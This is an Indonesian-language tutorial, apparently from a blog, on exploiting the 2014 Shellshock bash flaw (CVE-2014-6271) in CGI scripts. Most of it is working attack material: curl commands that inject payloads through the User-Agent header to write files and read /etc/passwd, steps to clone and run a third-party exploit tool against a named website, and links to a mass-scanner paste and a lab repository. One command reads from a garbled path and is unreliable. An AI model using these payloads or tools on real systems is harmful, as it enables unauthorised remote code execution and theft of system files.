Shellshock adalah kerentanan yang ditemukan pada sistem operasi linux pada tahun 2014 (CVE-2014-6271). Shellshock sendiri memanfaatkan kerentanan dalam shell bash code execution yang berpotensi memungkinkan peretas mengambil kendali mesin dan melakukan RCE (Remote Code Execution) langsung ke sistem.
Di tahun 2020 sendiri bug shellshock sudah dianggap Out Of Date dan jarang sekali ditemukan, namun tidak ada salahnya untuk mempelajari teknik 1 ini. Bug Ini biasa ditemukan pada website yang mempunyai path /cgi-bin/ .Kita akan belajar 2 cara melakukan exploitasi bug ini. yang pertama manual menggunakan curl, dan yang ke 2 menggunakan tools.
Exploitasi Shellshock Manual
Source: Vendetablog
curl -k http://localhost/cgi-bin/test-cgi -H "User-Agent: () { :; }; echo Hacked > /tmp/Hacked"
Untuk Melihat File bisa menggunakan command
curl -k http://localhost/cgi-bin/test-cgi -H "User-Agent: () { :; }; cat /tmp/Hacked"
Source Linuxsec
curl -A “() { :; }; echo; /bin/cat /etc/passwd” http://localhost/cgi-bin/test-cgi > hacked.txt
Untuk Melihat File bisa menggunakan command
curl -A “() { :; }; echo; /bin/cat /cgi-bin/test-cgi/hacked.txt” http://localhost/cgi-bin/test-cgi
Exploitasi Shellshock With Tools
git clone https://github.com/googleinurl/Xpl-SHELLSHOCK-Ch3ck
cd Xpl-SHELLSHOCK-Ch3ck
php xpl.php -t 'http://www.nakanosec.com/cgi-bin/login.sh' -c pwd
Tool Mass Scanner
https://pastebin.com/djVUzdiT
Shellshock Labs
https://github.com/opsxcq/exploit-CVE-2014-6271Preview